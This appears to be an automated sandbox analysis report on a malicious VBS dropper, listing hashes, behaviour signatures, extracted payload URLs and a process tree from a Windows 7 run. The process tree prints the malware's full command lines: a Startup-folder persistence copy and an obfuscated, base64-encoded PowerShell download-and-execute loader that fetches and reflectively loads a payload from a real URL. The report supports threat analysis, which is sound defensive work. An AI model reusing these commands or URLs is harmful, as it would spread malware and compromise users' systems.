Overview

overview

10

Static

static

1

705d179b12...39.vbs

windows7-x64

10

705d179b12...39.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    77s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-10-2024 01:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139.vbs

  • Size

    486KB

  • MD5

    bfe8bd92459f45bda7c2144a9ae3ad70

  • SHA1

    5c8a674b4dec5b7c6bfe579d5ba7c30bd426b66f

  • SHA256

    705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139

  • SHA512

    fbd3c5fa3bf90cec9227912c203898870716d0cb50b0a6caade19aaf4493dce3cc4a7c1a77c713fe8963159d3195837ca1ef6dcfde8700fceed633aa7c3e7d06

  • SSDEEP

    12288:KZejbep/wU35vTs06uFBRBzPupRWdOrDt/bDqPm3hqekZEeWZCmHFLCCAYpdStSU:NX2oZLRgIZ2

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:320
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aUV4ICgoJ2wnKydjJysnWicrJ3VybCA9JysnIFU4Y2h0dHAnKydzOi8vJysncmF3LicrJ2dpdCcrJ2h1YicrJ3UnKydzZXInKydjbycrJ250JysnZW50LmNvbS8nKydOb0RldGVjdE9uL05vRGV0ZScrJ2N0TycrJ24vcmVmcy8nKydoZScrJ2FkcycrJy9tYWluL0RlJysndGEnKydoTm90JysnaC1WLnR4dCcrJ1U4YzsgJysnbGMnKydaYmFzZTY0JysnQ28nKydudGVudCA9ICcrJyhOZXctT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2wnKydpZW50KS5Eb3cnKyduJysnbG9hJysnZFN0cmknKyduZygnKydsYycrJ1p1cmwnKycpJysnOyBsJysnY1piaW5hcnlDb250ZScrJ250ID0gW1MnKyd5JysncycrJ3RlbS5DbycrJ252ZXInKyd0XTonKyc6JysnRnJvbUJhJysnc2UnKyc2JysnNFN0cmluZyhsY1onKydiYXNlNjRDb250ZW4nKyd0KScrJzsnKycgbGNaYXNzJysnZW0nKydibHkgJysnPSBbJysnUmVmbCcrJ2VjdGknKydvbi5BcycrJ3NlbWJseV06OkxvJysnYWQobCcrJ2MnKydaJysnYmluJysnYXJ5JysnQ29udGVuJysndCknKyc7JysnIFtkbmxpYi4nKydJTy5Ib20nKydlJysnXTo6JysnVkFJKFI3ODAnKycvQ28nKydoJysnblUvZC8nKydlZS5lJysndCcrJ3NhcC8nKycvOnNwdHQnKydoUicrJzc4LCBSNzhkZXMnKydhdCcrJ2knKyd2YWRvUjc4LCcrJyBSNycrJzgnKydkZXNhdGknKyd2JysnYWQnKydvUjc4LCAnKydSNzhkZXNhJysndCcrJ2knKyd2YWRvUjc4JysnLCBSNycrJzhBZGRJblAnKydyb2Nlc3MzMlInKyc3OCwgUjc4UicrJzc4LFI3OFI3OCcrJyknKS5yRXBsYWNFKCdsY1onLFtzdHJJTkddW0NIQXJdMzYpLnJFcGxhY0UoKFtDSEFyXTg1K1tDSEFyXTU2K1tDSEFyXTk5KSxbc3RySU5HXVtDSEFyXTM5KS5yRXBsYWNFKChbQ0hBcl04MitbQ0hBcl01NStbQ0hBcl01NiksW3N0cklOR11bQ0hBcl0zNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iEx (('l'+'c'+'Z'+'url ='+' U8chttp'+'s://'+'raw.'+'git'+'hub'+'u'+'ser'+'co'+'nt'+'ent.com/'+'NoDetectOn/NoDete'+'ctO'+'n/refs/'+'he'+'ads'+'/main/De'+'ta'+'hNot'+'h-V.txt'+'U8c; '+'lc'+'Zbase64'+'Co'+'ntent = '+'(New-Object S'+'ystem.Net.WebCl'+'ient).Dow'+'n'+'loa'+'dStri'+'ng('+'lc'+'Zurl'+')'+'; l'+'cZbinaryConte'+'nt = [S'+'y'+'s'+'tem.Co'+'nver'+'t]:'+':'+'FromBa'+'se'+'6'+'4String(lcZ'+'base64Conten'+'t)'+';'+' lcZass'+'em'+'bly '+'= ['+'Refl'+'ecti'+'on.As'+'sembly]::Lo'+'ad(l'+'c'+'Z'+'bin'+'ary'+'Conten'+'t)'+';'+' [dnlib.'+'IO.Hom'+'e'+']::'+'VAI(R780'+'/Co'+'h'+'nU/d/'+'ee.e'+'t'+'sap/'+'/:sptt'+'hR'+'78, R78des'+'at'+'i'+'vadoR78,'+' R7'+'8'+'desati'+'v'+'ad'+'oR78, '+'R78desa'+'t'+'i'+'vadoR78'+', R7'+'8AddInP'+'rocess32R'+'78, R78R'+'78,R78R78'+')').rEplacE('lcZ',[strING][CHAr]36).rEplacE(([CHAr]85+[CHAr]56+[CHAr]99),[strING][CHAr]39).rEplacE(([CHAr]82+[CHAr]55+[CHAr]56),[strING][CHAr]34) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    0a267e6ee73f8d1b5a9f5aacb280279b

    SHA1

    a8b830e2dd0df69c9e6ba72b6da66c94c0d09a80

    SHA256

    895ac4bfedbeff3a7d48772a38e78b6024f0a521a6a004fc78043efd771da026

    SHA512

    31dfbbf2881cf78e8f8b1bf1db0d32a49ce441484de8d4132e76acc7289df41995b2b875a5c7a1eb50f6043cd74ab11eb5dfd266b16b357b75e221e4f1d7fbfb

    Download Submit

  • memory/2652-19-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2652-20-0x0000000002410000-0x0000000002418000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2920-5-0x000007FEF490E000-0x000007FEF490F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2920-6-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2920-7-0x0000000001E50000-0x0000000001E58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2920-8-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-9-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-10-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-11-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-12-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-13-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download